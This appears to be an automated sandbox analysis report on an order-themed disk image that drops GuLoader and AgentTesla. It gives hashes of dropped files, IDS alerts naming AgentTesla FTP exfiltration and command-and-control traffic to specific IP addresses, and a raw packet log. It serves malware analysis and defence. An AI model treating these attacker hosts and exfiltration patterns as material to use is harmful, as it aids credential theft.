Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | DBatLoader, FormBook | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | DBatLoader, FormBook | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Sality | Browse |
| ||
SERVERGARDEN-ASServergardenKftHU | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | DBatLoader, Lokibot | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\nsj41C4.tmp\System.dll | Get hash | malicious | AgentTesla, GuLoader | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | GuLoader | Browse | |||
Get hash | malicious | GuLoader | Browse | |||
Get hash | malicious | GuLoader | Browse | |||
Get hash | malicious | GuLoader | Browse | |||
Get hash | malicious | AgentTesla, GuLoader | Browse | |||
Get hash | malicious | GuLoader | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2520 |
Entropy (8bit): | 5.3932612599582725 |
Encrypted: | false |
SSDEEP: | 48:tnWSU4y4RFymFoUeW+gZ9tlNWR83tVAOVbBQLXjvxs8MXgeRUXNcWszKwhjt:tnLHyIFvKLgZXW8r9NBQLXjZs8EgiDWK |
MD5: | AC931D7549F24A98320989CAFAE44F54 |
SHA1: | FEFE8A35DEAE3E9A7923245607219D561E6D1716 |
SHA-256: | B9B924A409378251665673ACD4C56DC5CFDE3147E828EB77EF95B6EEC2179D07 |
SHA-512: | CA6317B8B9CAEC279DA195A8C86779491C3E789456C9AD6A482CE4E046B5038705B61C20F65F2C5BEE07963B4E587A99FF37EC048ABF7C7E711CB835395D4597 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Objedn vka_20248481119000903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11776 |
Entropy (8bit): | 5.6557532861400945 |
Encrypted: | false |
SSDEEP: | 192:eK24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlASl:u8QIl975eXqlWBrz7YLOlA |
MD5: | 0FF2D70CFDC8095EA99CA2DABBEC3CD7 |
SHA1: | 10C51496D37CECD0E8A503A5A9BB2329D9B38116 |
SHA-256: | 982C5FB7ADA7D8C9BC3E419D1C35DA6F05BC5DD845940C179AF3A33D00A36A8B |
SHA-512: | CB5FC0B3194F469B833C2C9ABF493FCEC5251E8609881B7F5E095B9BD09ED468168E95DDA0BA415A7D8D6B7F0DEE735467C0ED8E52B223EB5359986891BA6E2E |
Malicious: | false |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 325 |
Entropy (8bit): | 4.605093863631794 |
Encrypted: | false |
SSDEEP: | 6:wvMYFVEh1IMBdZ1ErQNwvqHK/NarHg2a9yoEdU06X//F:wvMYFVEh15snd/Narg2a9yA06XV |
MD5: | 4FC139BB7FD40D07D014719905BBCF29 |
SHA1: | 4B6D70E99172EFB17A536816C9123B881AD8B5F7 |
SHA-256: | 9E152AD5AD2710D9FB793B69C178AAABC9D532B6870BEF396DC11AC845A3765E |
SHA-512: | 1880F7F88DAD75AE5A6557A057015F49B8499150DE89A28F5AC8B7B3A116AB23E3328627DCB674606EC0DA89C854EBB60CA30D7D9DF9569C7FE82B832C686A58 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Objedn vka_20248481119000903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 450378 |
Entropy (8bit): | 6.984124356008776 |
Encrypted: | false |
SSDEEP: | 12288:kmZpvAus5Uv75v31PZjMtMd6zHWsyH9kT:Hjv60VP1PZjMc6T/ |
MD5: | D197341F80811D345D0729CB0C367AFC |
SHA1: | 06800A1FEF4500257656ED2F456DCDA91C771023 |
SHA-256: | 7DC908E0732D9929C06C6518F505C27822BA13AD398149B1165B222E27C7D3DD |
SHA-512: | 1681965F13AB2D6D29F9596392957402F07DDF31ABE3D4E4F055DCD9A482803B5F5502AC87976901D9F3EA21C499DC47B4ED569E6F20AA3B45E58BBF718EC800 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Objedn vka_20248481119000903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 400450 |
Entropy (8bit): | 1.248707194590998 |
Encrypted: | false |
SSDEEP: | 768:8Bbz4BxcTdMmSUh90wLvydX7O7u1q7vKhk28IKe5IHo3efZIQEfXJ0GphG6HQp69:q0TLylBx9AHHQf/7aWZTaqG/XkAku |
MD5: | DE23F93FE5307EBD2882DD6E94D9B889 |
SHA1: | E9FC2885BCC8E9818FD261D08B2CFA47ED2A5FBA |
SHA-256: | 9D19A6317F91947B0B99630805FCDFEA004490D433F2C2B3E7E77750B00E5F91 |
SHA-512: | 588F55A1B18450E36E6213961F3EC0F0DA4A9D22BAC508E0F635853323840E9CA30951A32B21D41002FEF29CBD9FD3755C02EA9F101488339033FB721A67D967 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Objedn vka_20248481119000903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 351962 |
Entropy (8bit): | 1.2579220366020167 |
Encrypted: | false |
SSDEEP: | 768:sBeE6smGvQdN86fCzFo/30XUgjJ0Mqim4RgAbUQzniiRghb9CmyFGIoqmg918OMU:MtuR0Yu7ivu4XKhAJUVWE6au |
MD5: | DF506635717E0CC22E0C2005C5581B9E |
SHA1: | 56BB3598D19E304A8A4B490BC09F8B2EB80DC716 |
SHA-256: | 8210EFAF7FBD9602F820A58FA3332F251D93D16EB3385539BE59BE310D7358D2 |
SHA-512: | 2A3AD4FD8FD8C0D07F249E6F886A48E2304E908264761A2D020548752FF274FFC92B862EB911F02CC7E97C44AB0C1C9097C772CE67FFDD5FFEB8F0BA87853564 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Objedn vka_20248481119000903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 395805 |
Entropy (8bit): | 1.252290904287034 |
Encrypted: | false |
SSDEEP: | 768:LD7DoMuhwQnz1J6vU99w3a1IKrFC0d2U01xfwFmGWc54ajEkqKTCW/wUCpSPjAuK:LIw0t/C1vuWhQWXiH95AJijTZFw |
MD5: | 85972D81F1A3BD37ADFD250FE67B2432 |
SHA1: | FA2441AB02AD3FB5FC8BB711689BE4229EA884CE |
SHA-256: | 5372037577E6C38EBFE90D38305A237DEA052D7EF16A253E820624A4302FCB51 |
SHA-512: | C0EC5861FB9F27169AFD3DAA00CDED4784C11799B37FF2F58E5F443AE5718FBC9CED38C281CACC1305ACADE1A36925F8C5070EB31FDE553818A60F0D44E3FDB5 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Objedn vka_20248481119000903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 340033 |
Entropy (8bit): | 1.2563431715436053 |
Encrypted: | false |
SSDEEP: | 768:M89WVAuwGsZsyzNvzr/3yfRfAlhEvxu8T3C4rnYjU55Tg4JBKIDh2FNxMFozUogx:M5xKniA7Iz7OqBI2zWewUGQhZb1 |
MD5: | CCC70DCD9D5F8D5BF1A6CACFEBDC854E |
SHA1: | C24A3DBA478BB6BAA7D4CA70BAF3EF152021450A |
SHA-256: | CCD710DEBD851EED37F51886924A544040993F21B743CDEDD24C6FEA4BC57C62 |
SHA-512: | 3A8155CA7F7F48AD3F0A7A77AE0075D371B1A281670531B91BB0BF42E7B4EF8725206B9872BBBF4211EB8B6261F52F1332D7421AD36913F54BD7841E6A3F09AA |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Objedn vka_20248481119000903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 503 |
Entropy (8bit): | 4.155338028293255 |
Encrypted: | false |
SSDEEP: | 12:dpQCe39LqW9Jg0zRZELoPtYq7oWynAfO6dp:dypTv9YEchN+p |
MD5: | AD7AE25E68F9D7CB8902D5A114AC3DAF |
SHA1: | 1EA182BF15051F4FA2BFA53E7771FD616A00D0CD |
SHA-256: | 0A64CF29DA53848A65687EDBD8E60C55A43CB06D4945C94BD6FA5CFE1CA589E5 |
SHA-512: | 774A7B312A26E4F699C43C9267228D934394F13576D366BD0C3722B75DDDB4565388D1B98BF56495AED05CFCFCAAF4D27EF186190675A7B0E78941974C005C15 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Objedn vka_20248481119000903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 325405 |
Entropy (8bit): | 1.246396968978626 |
Encrypted: | false |
SSDEEP: | 1536:ZlQllV6CDA7MPbmnsU16bMeUyDSKeVN/ABuS:SbwMzmYT1e4d |
MD5: | 2065053F8690386ADB8CD35F9064C64C |
SHA1: | EC62B55F8178B86C350E7B47490046F9B2FB1574 |
SHA-256: | B74077F003FE05F1147D8C96A7DEFFE44C07CBCFC4F35CF9F97EEC69F3E1D389 |
SHA-512: | 91E667B943E8E7CAB1BB0441BF27170C1CEA30253F2C3EA63C9EE305D262DF3A7EB1EC1C115852995E6C6A6E01B3DEC7B57A3418086471739A71639A7D5A0345 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1009888 |
Entropy (8bit): | 7.614077813916298 |
Encrypted: | false |
SSDEEP: | 24576:SvCFfkjgVitNv7LtnP0deH7ZONDejqaBjiMD95w78:1FfkjvlnYeHqej9iMD9/ |
MD5: | FFC86DFE93F81BCE26A2B4D2D818B167 |
SHA1: | 0FFF0A167C2BE3C66E3DBC9573482B0ED77BFA48 |
SHA-256: | F10D9EA2A6E79BD7F191737A8C45E7FA3A8C72C2DC3CBE160CCA365A42FFAC7B |
SHA-512: | E359DA6BC5282126BB91A85D80C5FFE61D3FDF56C6EB1B580938070B8ADCF8B6100CC86E94237A4D628BDB82CB8474B5E11E4749DF5C5993D89BD28A856F6253 |
Malicious: | true |
Antivirus: |
|
Preview: |
File type: | |
Entropy (8bit): | 5.576641722469149 |
TrID: |
|
File name: | Objedn#U00e1vka_20248481119000903.img |
File size: | 1'572'864 bytes |
MD5: | 8b2f7394817f048cb466ad9046458f3a |
SHA1: | af12cb22f90f8ba4b84b7c8a2d691f66a800fc0f |
SHA256: | f65bcb980c5bf774ba123d8cdede4a455e766c0b1935f3e0c892608fdc6f19b0 |
SHA512: | cfb17c7e64b20168b2ef7725ce287028795f32290be9428377c1e23e9cf4ba94050f7aed0113a35da9567a8841d6008e7b25f34b235012618f051446adac281d |
SSDEEP: | 24576:pvCFfkjgVitNv7LtnP0deH7ZONDejqaBjiMD95w7:sFfkjvlnYeHqej9iMD9 |
TLSH: | 9D7512803698DF83D79C567049BCDBB646B46FEC6C20820677ECEE0E7F36B55581428A |
File Content Preview: | ............................................................................................................................................................................................................................................................... |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-02T11:36:11.831801+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49736 | 185.33.55.26 | 80 | TCP |
2024-12-02T11:36:18.961506+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49737 | 86.107.36.93 | 21 | TCP |
2024-12-02T11:36:20.106119+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49738 | 86.107.36.93 | 35334 | TCP |
2024-12-02T11:36:20.226620+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49738 | 86.107.36.93 | 35334 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 2, 2024 11:36:10.423219919 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:10.543152094 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:10.543250084 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:10.543442011 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:10.663341045 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.831723928 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.831749916 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.831760883 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.831800938 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:11.831828117 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:11.831842899 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.831887960 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:11.831887960 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.831902027 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.831912041 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.831933975 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:11.831947088 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:11.832129002 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.832139969 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.832149982 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.832290888 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:11.951905966 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.951936007 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:11.952002048 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:11.952037096 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.023770094 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.023821115 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.023844957 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.023885012 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.071826935 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.071840048 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.071871042 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.071902990 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.143759966 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.143788099 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.143917084 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.191823006 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191833973 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191843987 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191854000 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191873074 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191883087 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191893101 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191903114 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191911936 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191921949 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191936970 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191941023 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.191948891 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191960096 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.191970110 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.192060947 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.192082882 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.192162037 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.192173958 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.192183971 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.192207098 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.192223072 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.215708017 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.215778112 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.215814114 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.215867996 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.219415903 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.219469070 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.219475031 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.219515085 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.227061033 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.227118969 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.227154970 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.227212906 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.263886929 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.263946056 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.264034033 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.264075041 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.267731905 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.267786026 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.267858028 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.267894983 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.311877012 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.311918020 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.311954021 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.311995029 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.315722942 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.315790892 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.315850973 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.315915108 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.323424101 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.323481083 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.323539019 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.323579073 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.331166029 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.331235886 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.331239939 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.331291914 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.336395979 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.336456060 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.336529970 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.336575031 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.341753960 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.341804981 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.341841936 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.341898918 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.347162962 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.347224951 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.347263098 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.347316980 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.352482080 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.352541924 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.352580070 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.352617025 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.357839108 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.357898951 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.357975960 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.358017921 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.363246918 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.363298893 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.363359928 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.363414049 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.368511915 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.368562937 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.368688107 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.368731976 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.374002934 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.374047995 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.374141932 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.374177933 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.379252911 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.379307032 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.379364014 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.379403114 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.384577036 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.384620905 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.384706020 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.384748936 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
